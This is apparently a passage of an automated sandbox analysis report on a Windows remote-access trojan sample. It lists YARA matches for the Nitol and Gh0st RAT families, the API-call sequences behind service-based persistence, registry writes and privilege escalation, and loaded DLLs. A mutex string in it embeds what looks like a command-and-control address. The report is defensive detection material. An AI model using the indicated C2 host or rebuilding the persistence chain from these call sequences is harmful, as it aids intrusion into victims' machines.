                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitol author = ditekSHen, description = Detects Nitol backdoor
                Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTRMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTRMatched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@3/1@0/2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00410AA0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,0_2_00410AA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040954F memcpy,CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,0_2_0040954F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10008A54 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,0_2_10008A54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10001503 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,0_2_10001503
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_00410AA0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,4_2_00410AA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0040954F memcpy,CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,4_2_0040954F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_10008A54 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,4_2_10008A54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_10001503 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,4_2_10001503
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040FC42 memset,memset,getsockname,memcpy,memcpy,GetVersionExA,RegOpenKeyA,RegQueryValueExA,RegCloseKey,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,memset,GetLastInputInfo,GetTickCount,0_2_0040FC42
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,_mbscat,_mbscat,CopyFileA,memset,_mbscpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,_mbscpy,_mbscat,RegOpenKeyA,lstrlen,RegSetValueExA,0_2_00411ACF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: wsprintfA,GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,strcat,strcat,CopyFileA,memset,strcpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,strcpy,strcat,RegOpenKeyA,lstrlenA,RegSetValueExA,0_2_10009A83
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,_mbscat,_mbscat,CopyFileA,memset,_mbscpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,_mbscpy,_mbscat,RegOpenKeyA,lstrlen,RegSetValueExA,4_2_00411ACF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: wsprintfA,GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,strcat,strcat,CopyFileA,memset,strcpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,strcpy,strcat,RegOpenKeyA,lstrlenA,RegSetValueExA,4_2_10009A83
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_100073C4 lstrcpyA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,strstr,lstrcatA,Process32First,lstrcmpiA,Process32Next,lstrcatA,lstrcatA,strstr,CloseHandle,lstrlenA,lstrcpyA,FreeLibrary,0_2_100073C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00411ACF GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,_mbscat,_mbscat,CopyFileA,memset,_mbscpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,_mbscpy,_mbscat,RegOpenKeyA,lstrlen,RegSetValueExA,0_2_00411ACF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_100095A4 fuckyou,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,wsprintfA,wsprintfA,GetVersionExA,GetVersionExA,GetVersionExA,CreateThread,Sleep,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,strlen,strlen,strcat,strcat,GetModuleFileNameA,CopyFileA,Sleep,ExitProcess,CreateThread,wsprintfA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,sprintf,lstrlenA,wsprintfA,memset,GetModuleFileNameA,SHGetSpecialFolderPathA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,MoveFileA,memset,GetModuleFileNameA,Sleep,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,0_2_100095A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_100095A4 fuckyou,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,wsprintfA,wsprintfA,GetVersionExA,GetVersionExA,GetVersionExA,CreateThread,Sleep,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,strlen,strlen,strcat,strcat,GetModuleFileNameA,CopyFileA,Sleep,ExitProcess,CreateThread,wsprintfA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,sprintf,lstrlenA,wsprintfA,memset,GetModuleFileNameA,SHGetSpecialFolderPathA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,MoveFileA,memset,GetModuleFileNameA,Sleep,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,4_2_100095A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeMutant created: \Sessions\1\BaseNamedObjects\110.40.45.163:70:Rsjshd fzfgkqcm
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile read: C:\Program Files\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mfc42.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: devenum.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mfc42.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mfc42.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: Binary string: iphlpapi.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.0000000002600000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.0000000002590000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp
